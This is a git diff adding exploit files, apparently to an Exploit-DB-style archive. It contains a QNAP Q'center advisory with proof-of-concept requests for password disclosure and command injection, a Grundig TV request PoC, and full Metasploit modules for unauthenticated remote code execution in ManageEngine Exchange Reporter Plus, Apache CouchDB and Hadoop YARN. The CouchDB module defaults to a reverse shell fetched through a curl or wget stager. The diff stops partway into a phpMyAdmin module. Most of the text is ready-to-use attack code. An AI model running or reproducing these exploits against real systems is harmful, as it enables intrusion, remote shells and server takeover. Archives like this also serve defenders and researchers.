diff --git a/exploits/hardware/webapps/45015.txt b/exploits/hardware/webapps/45015.txt new file mode 100644 index 000000000..49115f249 --- /dev/null +++ b/exploits/hardware/webapps/45015.txt @@ -0,0 +1,398 @@ +Core Security - Corelabs Advisory +http://corelabs.coresecurity.com/ + +QNAP Qcenter Virtual Appliance Multiple Vulnerabilities + +1. *Advisory Information* + +Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities +Advisory ID: CORE-2018-0006 +Advisory URL: +http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities +Date published: 2018-07-11 +Date of last update: 2018-07-11 +Vendors contacted: QNAP +Release mode: Coordinated release + +2. *Vulnerability Information* + +Class: Information Exposure [CWE-200], Command Injection [CWE-77], +Command Injection [CWE-77], Command Injection [CWE-77], +Command Injection [CWE-77] +Impact: Code execution +Remotely Exploitable: Yes +Locally Exploitable: Yes +CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709, +CVE-2018-0710 + +3. *Vulnerability Description* + +QNAP's website states that: + +[1] Q'center Virtual Appliance is a central management platform that +enables you to consolidate the management of multiple QNAP NAS. The +Q'center web interface gives you the ease-of-use, cost-efficiency, +convenience and flexibility to manage multiple NAS, across multiple +sites, from any internet browser. + +The platform's provides centralized web-based administration to manage +the following features: + +- Review HDD S.M.A.R.T. values +- Monitor system status +- Manage apps and shared folders +- Review infographice reports + +Multiple vulnerabilities were found in the Q'center Virtual Appliance +web console that would allow an attacker to execute arbitrary commands +on the system. + +4. *Vulnerable versions* + +. Q'center Virtual Appliance Version 1.6.1056 (20170825) +. Q'center Virtual Appliance Version 1.6.1075 (20171123) +Other products and versions might be affected, but they were not tested. + +5. *Vendor Information, Solutions and Workarounds* + +QNAP published the following Security Note: + +. https://www.qnap.com/en-us/security-advisory/nas-201807-10 + +6. *Credits* + +These vulnerabilities were discovered and researched by Ivan Huertas +from Core Security Consulting Services. The publication of this advisory +was coordinated by Leandro Cuozzo from Core Advisories Team. + +7. *Technical Description / Proof of Concept Code* + +QNAP's Q'center Virtual Appliance web console includes a functionality +that would allow an authenticated attacker to elevate privileges on the +system. We describe this issue in section 7.1. + +Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command +execution. + +7.1. *Privilege escalation* + +[CVE-2018-0706] +The application contains an API endpoint that returns information about +the accounts defined in the database. The information returned is +informative for all the users except for the admin user, which cames +with every installation, where an extra field is presented. This extra +field (new_password) contains the password defined at installation time +for the admin user encoded in base64. + +Any authenticated user could access this API endpoint and retrieve the +admin user's password, therefore being able to login as an administrator. + +The following proof of concept shows a user with viewer access +retrieving the admin's password encoded in base64 in the new_password +field. + +/----- +GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1 +Host: 192.168.1.178 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.178/qcenter/ +Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; +DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432; +_ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false +Connection: close + +HTTP/1.1 200 OK +Date: Thu, 01 Mar 2018 19:23:43 GMT +Server: Apache +X-Frame-Options: SAMEORIGIN +X-XSS-Protection: 1; mode=block +X-Content-Type-Options: nosniff +Content-Type: application/json +Content-Length: 878 +Connection: close + +{ +"total_count": 2, +"account": [ +{ +"dst_enable": false, +"name": "admin", +"default": true, +"new_password": "YWRtaW5pc3RyYWRvcg==", +"authentication": 0, +"create_time": { +"$date": 1519917983616 +}, +"role": 4294967295, +"timezone_code": 17, +"last_login": { +"$date": 1519929869797 +}, +"_id": "5a981b9f3af7e2030c883592", +"email": "", +"description": "administrator" +}, +{ +"dst_enable": false, +"name": "viewer", +"register_code": "", +"authentication": 0, +"create_time": { +"$date": 1519929122332 +}, +"role": 1082130432, +"timezone_code": 17, +"last_login": { +"$date": 1519932215818 +}, +"_id": "5a9847223af7e2034924e7b6", +"email": "", +"description": "" +} +] +} +-----/ + +As can be seen in the following excerpt, the decoded base64 data +corresponds to the plaintext administrator password set at installation +time. + +/----- +$ echo YWRtaW5pc3RyYWRvcg== | base64 -d +administrador +-----/ + +7.2. *Command Execution in change password for the admin user* + +[CVE-2018-0707] +When the admin user performs a password change, the application executes +an OS command to impact the changes. The input is not properly sanitized +when passed down to the OS, allowing an attacker to run arbitrary +commands. + +/----- +POST /qcenter/hawkeye/v1/account?change_passwd HTTP/1.1 +Host: 192.168.1.209 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.209/qcenter/ +Content-Length: 118 +Cookie: CMS_lang=ENG; user=admin; CMS_SID=TWYH7A55X5; ROLE=4294967295; +_ID=5a8465ba3af7e2030984c84e; LOGIN_TIME=1518714672547; +AUTHENTICATION=0; TIMEZONE_CODE=17; DST_ENABLE=False; remember=false +Connection: close + +{"_id":"5a8465ba3af7e2030984c84e","old_password":"dGlzMzhhZWw=","new_password":"Ijt0b3VjaCAvdG1wL2NoYW5nZXBhc3M7Ig=="} +-----/ + +The API requires to send the password encoded in base64. This makes a +lot easier to inject command as we do not need to bypass any filters. +For the admin user in the web application, there is also a backing user +present on the OS. When a password change is requested for this user, +the values submitted to the API are included in a "sudo passwd" command, +where the injection occurs. + +In this particular case, the old_password must match the current +password, which can be obtained by exploiting [CVE-2018-0706]. + +7.3. *Command Execution in network config update* + +[CVE-2018-0708] +The admin user created at installation time can modify the network +configuration. In order to do this, the admin has to access the settings +section which is protected by the OS password (which could be obtained +using the Privilege Escalation vulnerability described above). However, +we identified that a user with the Power User profile could also execute +this function, despite access not being provided through the web +application interface. This function requires to send the admin user +password encoded in base64 in the passwd field. This value is then used +to perform a sudo operation in the OS to change the network settings. We +used the passwd field to inject command +(";touch /tmp/netconfigpower; echo "a) and create a file in /tmp/. + +/----- +POST /qcenter/hawkeye/v1/network_config HTTP/1.1 +Host: 192.168.1.178 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.178/qcenter/ +Content-Length: 87 +Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; +DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735; +_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false +Connection: close + +{"type":"0","dns_type":"0","passwd":"Ijt0b3VjaCAvdG1wL25ldGNvbmZpZ3Bvd2VyOyBlY2hvICJh"} +-----/ + +The passwd parameter is used in bash echo command unsanitized. + +7.4. *Command Execution in date config update* + +[CVE-2018-0709] +The admin user created at installation time is capable of modifying the +date configuration. In order to do this, the admin has to access the +settings section which is protected by the OS password (which could be +obtained using the Privilege Escalation vulnerability described above). +However, we identified that a user with the Power User profile could +execute this function, despite the access is not provided through the +web application interface. This function requires to submit the admin +user password encoded in base64 in the passwd field. This value is then +used to perform a sudo operation in the OS to change the date +configuration settings. We used the passwd field to inject command +(";touch /tmp/date_config;echo"lalala) and create a file in /tmp/. + +/----- +POST /qcenter/hawkeye/v1/date_config HTTP/1.1 +Host: 192.168.1.178 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.178/qcenter/ +Content-Length: 153 +Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; +DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735; +_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false +Connection: close + +{"listValue":18,"type":"1","datefield":1518663600000,"passwd":"Ijt0b3VjaCAvdG1wL2RhdGVfY29uZmlnO2VjaG8ibGFsYWxh","date":"20180215","time":"16:40:31"} +-----/ + +The passwd parameter is used in bash echo command unsanitized. + +7.5. *Command Execution in SSH settings config update* +[CVE-2018-0710] +The admin user created at installation time is capable of modifying the +SSH configuration. In order to do this, the admin has to access the +settings section which is protected by the OS password (which could be +obtained using the Privilege Escalation vulnerability). However, we +identified that a user with the Power User profile could execute this +function, despite the access is not provided through the web application +interface. This function requires to submit the admin user password +encoded in base64 in the passwd field. This value is then used to +perform a sudo operation in the OS to change the date configuration +settings. We used the passwd field to inject command +("";touch /tmp/ssh; echo "lalalala) and create a file in /tmp/. + +/----- +POST /qcenter/hawkeye/v1/ssh_setting_config HTTP/1.1 +Host: 192.168.1.178 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.178/qcenter/ +Content-Length: 82 +Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; +DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735; +_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false +Connection: close + +{"ssh_enable":1,"port":22,"passwd":"Ijt0b3VjaCAvdG1wL3NzaDsgZWNobyAibGFsYWxhbGE="} +-----/ + +The passwd parameter is used in bash echo command unsanitized. + +8. *Report Timeline* +2018-03-13: Core Security sent an initial notification to QNAP, +including a draft advisory. +2018-03-14: QNAP replied that they received the draft version of the +advisory and that they would review it. +2018-03-23: Core Security requested a status update. +2018-04-10: Core Security requested a confirmation about the reported +vulnerabilities and a tentative timescale to fix them. +2018-04-12: QNAP answered saying that they were unable to reproduce the +reported vulnerabilities and asked for more detailed information to +reproduce them. +2018-04-13: Core Security sent a more detailed guide to test. +2018-04-16: QNAP confirmed reception. +2018-04-26: Core Security requested a status update. +2018-04-29: QNAP confirmed the reported vulnerabilities and informed +that their software team were working in a fixed version. +2018-05-21: Core Security requested a status update. +2018-05-28: QNAP informed that a new version of Q'center would be +release by the week of June 4. +2018-05-28: Core Security thanked for the update and proposed June 13th +as publication date. +2018-05-29: QNAP answered saying that the new Q'center release was +delayed and asked to postpone the publication a week later. +2018-05-29: Core Security asked for a solidified release date in order +to go public at the same time. +2018-06-04: QNAP informed that they didn't have a confirmed date yet. +2018-06-08: Core Security asked QNAP for a status update. +2018-06-12: QNAP notified that Q'center was under testing, for that +reason they didn't have a confirmed release date. +2018-06-25: Core Security asked again for a status update. +2018-06-27: QNAP replied that they were expecting to release their +security advisory next week Thursday or Friday. +2018-06-28: Core Security informed QNAP that recommend vendors not to +publish near the weekend and proposed Wednesday July 11th as the +publication date. +2018-07-02: Core Security asked for a confirmation about the proposed +date. +2018-06-27: QNAP confirmed July 11th as the publication date. +2018-07-11: Advisory CORE-2018-0006 published. + +9. *References* + +[1] https://www.qnap.com/solution/qcenter/index.php + +10. *About CoreLabs* + +CoreLabs, the research center of Core Security, is charged with +anticipating the future needs and requirements for information security +technologies. +We conduct our research in several important areas of computer security +including system vulnerabilities, cyber attack planning and simulation, +source code auditing, and cryptography. Our results include problem +formalization, identification of vulnerabilities, novel solutions and +prototypes for new technologies. CoreLabs regularly publishes security +advisories, technical papers, project information and shared software +tools for public use at: +http://corelabs.coresecurity.com. + +11. *About Core Security* + +Core Security provides companies with the security insight they need to +know who, how, and what is vulnerable in their organization. The +company's threat-aware, identity & access, network security, and +vulnerability management solutions provide actionable insight and +context needed to manage security risks across the enterprise. This +shared insight gives customers a comprehensive view of their security +posture to make better security remediation decisions. Better insight +allows organizations to prioritize their efforts to protect critical +assets, take action sooner to mitigate access risk, and react faster if +a breach does occur. + +Core Security is headquartered in the USA with offices and operations in +South America, Europe, Middle East and Asia. To learn more, contact Core +Security at (678) 304-4500 or info@coresecurity.com + +12. *Disclaimer* + +The contents of this advisory are copyright (c) 2018 Core Security and +(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution +Non-Commercial Share-Alike 3.0 (United States) License: +http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \ No newline at end of file diff --git a/exploits/hardware/webapps/45022.txt b/exploits/hardware/webapps/45022.txt new file mode 100644 index 000000000..a4a61ac66 --- /dev/null +++ b/exploits/hardware/webapps/45022.txt @@ -0,0 +1,34 @@ +# Exploit Title: Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery +# Date: 2018-07-§3 +# Exploit Author: Ahmethan-Gultekin - t4rkd3vilz +# Vendor Homepage: https://www.grundig.com/ +# Software Link: https://play.google.com/store/apps/details?id=arcelik +# Version: Before > Smart Inter@ctive 3.0 +# Tested on: Kali Linux +# CVE : CVE-2018-13989 + +# I'm trying my TV.I saw a Grundig remote control application on +# Google Play. Computer I downloaded and decompiled APK. +# And I began to examine individual classes. I noticed in a class +# that a request was sent during operations on the command line. +# I downloaded the phone packet viewer and opened the control application and +# made some operations. And I saw that there was such a request; + +# PoC + +request -> +GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1 +Host: 192.168.1.106:8085 +Connection : Keep-Alive +User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) + + +response -> +HTTP/1.1 200 OK +Content-Type : text/plain + +# Set rc key is handled for key id : -2544 key symbol : -4081 +# The only requirement for the connection between the TV and the application +# was to have the same IP address. After I made the IP address on the TV +# and the phone and the IP address on the computer the same: +# I accessed the interface from the 8085 port. Now I could do anything from the computer :) \ No newline at end of file diff --git a/exploits/java/remote/45018.rb b/exploits/java/remote/45018.rb new file mode 100755 index 000000000..2bd65b0d9 --- /dev/null +++ b/exploits/java/remote/45018.rb @@ -0,0 +1,91 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE', + 'Description' => %q{ + This module exploits a remote code execution vulnerability that + exists in Exchange Reporter Plus <= 5310, caused by execution of + bcp.exe file inside ADSHACluster servlet + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Kacper Szurek ' + ], + 'References' => + [ + ['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html'] + ], + 'Platform' => ['win'], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [['Automatic', {}]], + 'DisclosureDate' => 'Jun 28 2018', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'The URI of the application', '/']), + Opt::RPORT(8181), + ]) + + end + + def bin_to_hex(s) + s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join + end + + def check + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion') + }) + + unless res + vprint_error 'Connection failed' + return CheckCode::Safe + end + + unless res.code == 200 + vprint_status 'Target is not Manage Engine Exchange Reporter Plus' + return CheckCode::Safe + end + + begin + json = res.get_json_document + raise if json.empty? || !json['BUILD_NUMBER'] + rescue + vprint_status 'Target is not Manage Engine Exchange Reporter Plus' + return CheckCode::Safe + end + + vprint_status "Version: #{json['BUILD_NUMBER']}" + + if json['BUILD_NUMBER'].to_i <= 5310 + return CheckCode::Appears + end + + CheckCode::Safe + end + + def exploit + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'), + 'vars_post' => { + 'MTCALL' => "nativeClient", + 'BCP_RLL' => "0102", + 'BCP_EXE' => bin_to_hex(generate_payload_exe) + } + }) + end +end \ No newline at end of file diff --git a/exploits/linux/remote/45019.rb b/exploits/linux/remote/45019.rb new file mode 100755 index 000000000..fc377e96d --- /dev/null +++ b/exploits/linux/remote/45019.rb @@ -0,0 +1,317 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache CouchDB Arbitrary Command Execution', + 'Description' => %q{ + CouchDB administrative users can configure the database server via HTTP(S). + Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. + This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, + including downloading and executing scripts from the public internet. + }, + 'Author' => [ + 'Max Justicz', # CVE-2017-12635 Vulnerability discovery + 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery + 'Green-m ' # Metasploit module + ], + 'References' => [ + ['CVE', '2017-12636'], + ['CVE', '2017-12635'], + ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'], + ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'], + ['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E'] + ], + 'DisclosureDate' => 'Apr 6 2016', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Privileged' => false, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x64/shell_reverse_tcp', + 'CMDSTAGER::FLAVOR' => 'curl' + }, + 'CmdStagerFlavor' => ['curl', 'wget'], + 'Targets' => [ + ['Automatic', {}], + ['Apache CouchDB version 1.x', {}], + ['Apache CouchDB version 2.x', {}] + ], + 'DefaultTarget' => 0 + )) + + register_options([ + Opt::RPORT(5984), + OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']), + OptString.new('HttpUsername', [false, 'The username to login as']), + OptString.new('HttpPassword', [false, 'The password to login with']) + ]) + + register_advanced_options([ + OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']), + OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp']) + ]) + end + + def check + get_version + version = Gem::Version.new(@version) + return CheckCode::Unknown if version.version.empty? + vprint_status "Found CouchDB version #{version}" + + return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) + + CheckCode::Safe + end + + def exploit + fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version + version = @version + + vprint_good("#{peer} - Authorization bypass successful") if auth_bypass + + print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager") + @cmdstager = generate_cmdstager( + temp: datastore['WritableDir'], + file: File.basename(cmdstager_path) + ).join(';') + + register_file_for_cleanup(cmdstager_path) + + if !datastore['Attempts'] || datastore['Attempts'] <= 0 + attempts = 1 + else + attempts = datastore['Attempts'] + end + + attempts.times do |i| + print_status("#{peer} - The #{i + 1} time to exploit") + send_payload(version) + Rex.sleep(5) + # break if we get the shell + break if session_created? + end + end + + # CVE-2017-12635 + # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, + # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization + # for the newly created user. + def auth_bypass + username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12) + password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12) + @auth = basic_auth(username, password) + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"), + 'method' => 'PUT', + 'ctype' => 'application/json', + 'data' => %({"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"}) + ) + + if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok'] + return true + else + return false + end + end + + def get_version + @version = nil + + begin + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + 'authorization' => @auth + ) + rescue Rex::ConnectionError + vprint_bad("#{peer} - Connection failed") + return false + end + + unless res + vprint_bad("#{peer} - No response, check if it is CouchDB. ") + return false + end + + if res && res.code == 401 + print_bad("#{peer} - Authentication required.") + return false + end + + if res && res.code == 200 + res_json = res.get_json_document + + if res_json.empty? + vprint_bad("#{peer} - Cannot parse the response, seems like it's not CouchDB.") + return false + end + + @version = res_json['version'] if res_json['version'] + return true + end + + vprint_warning("#{peer} - Version not found") + return true + end + + def send_payload(version) + vprint_status("#{peer} - CouchDB version is #{version}") if version + + version = Gem::Version.new(@version) + if version.version.empty? + vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.") + # if target set Automatic, exploit failed. + if target == targets[0] + fail_with(Failure::NoTarget, "#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.") + elsif target == targets[1] + payload1 + elsif target == targets[2] + payload2 + end + elsif version < Gem::Version.new('1.7.0') + payload1 + elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) + payload2 + elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0') + fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.") + end + end + + # Exploit with multi requests + # payload1 is for the version of couchdb below 1.7.0 + def payload1 + rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) + rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) + rand_db = Rex::Text.rand_text_alpha_lower(4..12) + rand_doc = Rex::Text.rand_text_alpha_lower(4..12) + rand_hex = Rex::Text.rand_text_hex(32) + rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}" + + register_file_for_cleanup(rand_file) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %("echo '#{@cmdstager}' > #{rand_file}") + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}"), + 'method' => 'PUT', + 'authorization' => @auth + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %({"_id": "#{rand_hex}"}) + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"), + 'method' => 'POST', + 'authorization' => @auth, + 'ctype' => 'application/json', + 'data' => %({"language":"#{rand_cmd1}","map":""}) + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %("/bin/sh #{rand_file}") + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"), + 'method' => 'POST', + 'authorization' => @auth, + 'ctype' => 'application/json', + 'data' => %({"language":"#{rand_cmd2}","map":""}) + ) + end + + # payload2 is for the version of couchdb below 2.1.1 + def payload2 + rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) + rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) + rand_db = Rex::Text.rand_text_alpha_lower(4..12) + rand_doc = Rex::Text.rand_text_alpha_lower(4..12) + rand_tmp = Rex::Text.rand_text_alpha_lower(4..12) + rand_hex = Rex::Text.rand_text_hex(32) + rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}" + + register_file_for_cleanup(rand_file) + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_membership"), + 'method' => 'GET', + 'authorization' => @auth + ) + + node = res.get_json_document['all_nodes'][0] + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %("echo '#{@cmdstager}' > #{rand_file}") + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}"), + 'method' => 'PUT', + 'authorization' => @auth + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %({"_id": "#{rand_hex}"}) + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'ctype' => 'application/json', + 'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"}) + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %("/bin/sh #{rand_file}") + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'ctype' => 'application/json', + 'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"}) + ) + end + + def cmdstager_path + @cmdstager_path ||= + "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}" + end + +end \ No newline at end of file diff --git a/exploits/linux/remote/45025.rb b/exploits/linux/remote/45025.rb new file mode 100755 index 000000000..e90d4ae66 --- /dev/null +++ b/exploits/linux/remote/45025.rb @@ -0,0 +1,92 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'cbmixx', # Proof of concept + 'Green-m ' # Metasploit module + ], + 'References' => + [ + ['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'], + ['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn'] + ], + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => + [ + ['Automatic', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 19 2016', + 'DefaultTarget' => 0 + )) + + register_options([Opt::RPORT(8088)]) + end + + def check + begin + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'), + 'method' => 'POST' + ) + rescue Rex::ConnectionError + vprint_error("#{peer} - Connection failed") + return CheckCode::Unknown + end + + if res && res.code == 200 && res.body.include?('application-id') + return CheckCode::Detected + end + + CheckCode::Safe + end + + def exploit + print_status('Sending Command') + execute_cmdstager + end + + def execute_command(cmd, opts = {}) + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'), + 'method' => 'POST' + ) + + app_id = res.get_json_document['application-id'] + + post = { + 'application-id' => app_id, + 'application-name' => Rex::Text.rand_text_alpha_lower(4..12), + 'application-type' => 'YARN', + 'am-container-spec' => { + 'commands' => {'command' => cmd.to_s} + } + } + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'), + 'method' => 'POST', + 'ctype' => 'application/json', + 'data' => post.to_json + ) + end + +end \ No newline at end of file diff --git a/exploits/php/remote/45020.rb b/exploits/php/remote/45020.rb new file mode 100755 index 000000000..4ba363bce --- /dev/null +++ b/exploits/php/remote/45020.rb @@ -0,0 +1,234 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'phpMyAdmin Authenticated Remote Code Execution', + 'Description' => %q{ + phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, + which can be exploited post-authentication to execute PHP code by + application. The module has been tested with phpMyAdmin v4.8.1. + }, + 'Author' => + [ + 'ChaMd5', # Vulnerability discovery and PoC + 'Henry Huang', # Vulnerability discovery and PoC + 'Jacob Robles' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'BID', '104532' ], + [ 'CVE', '2018-12613' ], + [ 'CWE', '661' ], + [ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ], + [ 'URL', 'https://www.secpulse.com/archives/72817.html' ], + [ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ] + ], + 'Privileged' => false, + 'Platform' => [ 'php' ], + 'Arch' => 